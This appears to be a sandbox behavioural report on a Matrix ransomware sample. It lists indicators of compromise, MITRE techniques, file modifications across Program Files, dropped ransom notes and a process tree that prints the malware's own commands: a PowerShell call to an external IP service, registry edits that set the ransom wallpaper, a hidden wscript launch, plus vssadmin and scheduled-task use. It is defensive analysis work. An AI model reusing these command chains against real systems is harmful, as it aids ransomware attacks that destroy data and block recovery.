File opened (read-only)	\??\R:	7FvmLmKL64.exe
File opened (read-only)	\??\Y:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\W:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\W:	7FvmLmKL64.exe
File opened (read-only)	\??\Y:	7FvmLmKL64.exe
File opened (read-only)	\??\N:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\M:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\J:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\F:	7FvmLmKL64.exe
File opened (read-only)	\??\M:	7FvmLmKL64.exe
File opened (read-only)	\??\T:	7FvmLmKL64.exe
File opened (read-only)	\??\Z:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\P:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\V:	7FvmLmKL64.exe
File opened (read-only)	\??\G:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\E:	7FvmLmKL64.exe
File opened (read-only)	\??\L:	7FvmLmKL64.exe
File opened (read-only)	\??\X:	7FvmLmKL64.exe
File opened (read-only)	\??\O:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\L:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\J:	7FvmLmKL64.exe
File opened (read-only)	\??\O:	7FvmLmKL64.exe
File opened (read-only)	\??\U:	7FvmLmKL64.exe
File opened (read-only)	\??\X:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\Q:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\Z:	7FvmLmKL64.exe
File opened (read-only)	\??\F:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\Q:	7FvmLmKL64.exe
File opened (read-only)	\??\H:	7FvmLmKL64.exe
File opened (read-only)	\??\K:	7FvmLmKL64.exe
File opened (read-only)	\??\P:	7FvmLmKL64.exe
File opened (read-only)	\??\S:	7FvmLmKL64.exe
File opened (read-only)	\??\V:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\K:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\ALVViAWm.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Makassar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Khartoum	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Adak	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Guayaquil	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jre7\bin\unpack200.exe	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\GoogleUpdateSetup.exe	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Rome	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.71\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created	C:\Program Files\Microsoft Games\Mahjong\en-US\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\sr.pak	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Merida	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\SystemV\CST6CDT	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Knox	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Microsoft Games\Minesweeper\en-US\Minesweeper.exe.mui	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Cairo	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\sl.pak	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\ja.pak	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Checkers\en-US\chkrzm.exe.mui	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Fakaofo	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\hi.pak	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-4	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Halifax	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1856	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1928	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1628	powershell.exe
1356	7FvmLmKL64.exe
1356	7FvmLmKL64.exe
1356	7FvmLmKL64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1356	7FvmLmKL64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	1356	7FvmLmKL64.exe
Token: SeLoadDriverPrivilege	1356	7FvmLmKL64.exe
Token: SeBackupPrivilege	676	vssvc.exe
Token: SeRestorePrivilege	676	vssvc.exe
Token: SeAuditPrivilege	676	vssvc.exe
Token: SeTakeOwnershipPrivilege	968	takeown.exe
Token: SeTakeOwnershipPrivilege	1856	takeown.exe
Token: SeTakeOwnershipPrivilege	1584	takeown.exe
Token: SeTakeOwnershipPrivilege	1588	takeown.exe
Token: SeIncreaseQuotaPrivilege	1564	WMIC.exe
Token: SeSecurityPrivilege	1564	WMIC.exe
Token: SeTakeOwnershipPrivilege	1564	WMIC.exe
Token: SeLoadDriverPrivilege	1564	WMIC.exe
Token: SeSystemProfilePrivilege	1564	WMIC.exe
Token: SeSystemtimePrivilege	1564	WMIC.exe
Token: SeProfSingleProcessPrivilege	1564	WMIC.exe
Token: SeIncBasePriorityPrivilege	1564	WMIC.exe
Token: SeCreatePagefilePrivilege	1564	WMIC.exe
Token: SeBackupPrivilege	1564	WMIC.exe
Token: SeRestorePrivilege	1564	WMIC.exe
Token: SeShutdownPrivilege	1564	WMIC.exe
Token: SeDebugPrivilege	1564	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1564	WMIC.exe
Token: SeRemoteShutdownPrivilege	1564	WMIC.exe
Token: SeUndockPrivilege	1564	WMIC.exe
Token: SeManageVolumePrivilege	1564	WMIC.exe
Token: 33	1564	WMIC.exe
Token: 34	1564	WMIC.exe
Token: 35	1564	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1564	WMIC.exe
Token: SeSecurityPrivilege	1564	WMIC.exe
Token: SeTakeOwnershipPrivilege	1564	WMIC.exe
Token: SeLoadDriverPrivilege	1564	WMIC.exe
Token: SeSystemProfilePrivilege	1564	WMIC.exe
Token: SeSystemtimePrivilege	1564	WMIC.exe
Token: SeProfSingleProcessPrivilege	1564	WMIC.exe
Token: SeIncBasePriorityPrivilege	1564	WMIC.exe
Token: SeCreatePagefilePrivilege	1564	WMIC.exe
Token: SeBackupPrivilege	1564	WMIC.exe
Token: SeRestorePrivilege	1564	WMIC.exe
Token: SeShutdownPrivilege	1564	WMIC.exe
Token: SeDebugPrivilege	1564	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1564	WMIC.exe
Token: SeRemoteShutdownPrivilege	1564	WMIC.exe
Token: SeUndockPrivilege	1564	WMIC.exe
Token: SeManageVolumePrivilege	1564	WMIC.exe
Token: 33	1564	WMIC.exe
Token: 34	1564	WMIC.exe
Token: 35	1564	WMIC.exe
Token: SeTakeOwnershipPrivilege	212	takeown.exe
Token: SeTakeOwnershipPrivilege	1532	takeown.exe
Token: SeTakeOwnershipPrivilege	968	takeown.exe
Token: SeTakeOwnershipPrivilege	1044	takeown.exe
Token: SeTakeOwnershipPrivilege	1644	takeown.exe
Token: SeTakeOwnershipPrivilege	1772	takeown.exe
Token: SeTakeOwnershipPrivilege	840	takeown.exe
Token: SeTakeOwnershipPrivilege	1748	takeown.exe
Token: SeTakeOwnershipPrivilege	220	takeown.exe
Token: SeTakeOwnershipPrivilege	708	takeown.exe
Token: SeTakeOwnershipPrivilege	280	takeown.exe
Token: SeTakeOwnershipPrivilege	1532	takeown.exe
Token: SeTakeOwnershipPrivilege	1944	takeown.exe
Token: SeTakeOwnershipPrivilege	204	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1652 wrote to memory of 320	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	28
PID 1652 wrote to memory of 320	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	28
PID 1652 wrote to memory of 320	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	28
PID 1652 wrote to memory of 320	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	28
PID 1652 wrote to memory of 884	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	30
PID 1652 wrote to memory of 884	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	30
PID 1652 wrote to memory of 884	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	30
PID 1652 wrote to memory of 884	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	30
PID 1652 wrote to memory of 1540	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	32
PID 1652 wrote to memory of 1540	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	32
PID 1652 wrote to memory of 1540	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	32
PID 1652 wrote to memory of 1540	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	32
PID 1540 wrote to memory of 1628	1540	cmd.exe	34
PID 1540 wrote to memory of 1628	1540	cmd.exe	34
PID 1540 wrote to memory of 1628	1540	cmd.exe	34
PID 1540 wrote to memory of 1628	1540	cmd.exe	34
PID 1652 wrote to memory of 1888	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	35
PID 1652 wrote to memory of 1888	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	35
PID 1652 wrote to memory of 1888	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	35
PID 1652 wrote to memory of 1888	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	35
PID 1652 wrote to memory of 1496	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	36
PID 1652 wrote to memory of 1496	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	36
PID 1652 wrote to memory of 1496	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	36
PID 1652 wrote to memory of 1496	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	36
PID 1888 wrote to memory of 1276	1888	cmd.exe	39
PID 1888 wrote to memory of 1276	1888	cmd.exe	39
PID 1888 wrote to memory of 1276	1888	cmd.exe	39
PID 1888 wrote to memory of 1276	1888	cmd.exe	39
PID 1496 wrote to memory of 1772	1496	cmd.exe	40
PID 1496 wrote to memory of 1772	1496	cmd.exe	40
PID 1496 wrote to memory of 1772	1496	cmd.exe	40
PID 1496 wrote to memory of 1772	1496	cmd.exe	40
PID 1888 wrote to memory of 1600	1888	cmd.exe	41
PID 1888 wrote to memory of 1600	1888	cmd.exe	41
PID 1888 wrote to memory of 1600	1888	cmd.exe	41
PID 1888 wrote to memory of 1600	1888	cmd.exe	41
PID 1888 wrote to memory of 2004	1888	cmd.exe	42
PID 1888 wrote to memory of 2004	1888	cmd.exe	42
PID 1888 wrote to memory of 2004	1888	cmd.exe	42
PID 1888 wrote to memory of 2004	1888	cmd.exe	42
PID 1652 wrote to memory of 776	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	43
PID 1652 wrote to memory of 776	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	43
PID 1652 wrote to memory of 776	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	43
PID 1652 wrote to memory of 776	1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe	43
PID 776 wrote to memory of 1200	776	cmd.exe	45
PID 776 wrote to memory of 1200	776	cmd.exe	45
PID 776 wrote to memory of 1200	776	cmd.exe	45
PID 776 wrote to memory of 1200	776	cmd.exe	45
PID 776 wrote to memory of 840	776	cmd.exe	46
PID 776 wrote to memory of 840	776	cmd.exe	46
PID 776 wrote to memory of 840	776	cmd.exe	46
PID 776 wrote to memory of 840	776	cmd.exe	46
PID 776 wrote to memory of 1520	776	cmd.exe	47
PID 776 wrote to memory of 1520	776	cmd.exe	47
PID 776 wrote to memory of 1520	776	cmd.exe	47
PID 776 wrote to memory of 1520	776	cmd.exe	47
PID 1772 wrote to memory of 1956	1772	wscript.exe	48
PID 1772 wrote to memory of 1956	1772	wscript.exe	48
PID 1772 wrote to memory of 1956	1772	wscript.exe	48
PID 1772 wrote to memory of 1956	1772	wscript.exe	48
PID 1520 wrote to memory of 612	1520	cmd.exe	49
PID 1520 wrote to memory of 612	1520	cmd.exe	49
PID 1520 wrote to memory of 612	1520	cmd.exe	49
PID 1520 wrote to memory of 612	1520	cmd.exe	49

C:\Users\Admin\AppData\Local\Temp\5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
"C:\Users\Admin\AppData\Local\Temp\5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1652
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe" "C:\Users\Admin\AppData\Local\Temp\NWJUqhnC.exe"
  2⤵
  PID:320
- C:\Users\Admin\AppData\Local\Temp\NWJUqhnC.exe
  "C:\Users\Admin\AppData\Local\Temp\NWJUqhnC.exe" -n
  2⤵
  - Executes dropped EXE
  PID:884
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\ZvFMaxk0.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1540
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\ALVViAWm.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1888
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\ALVViAWm.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\cuxDEpXK.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1496
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\cuxDEpXK.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1772
  - - C:\Windows\SysWOW64\cmd.exe
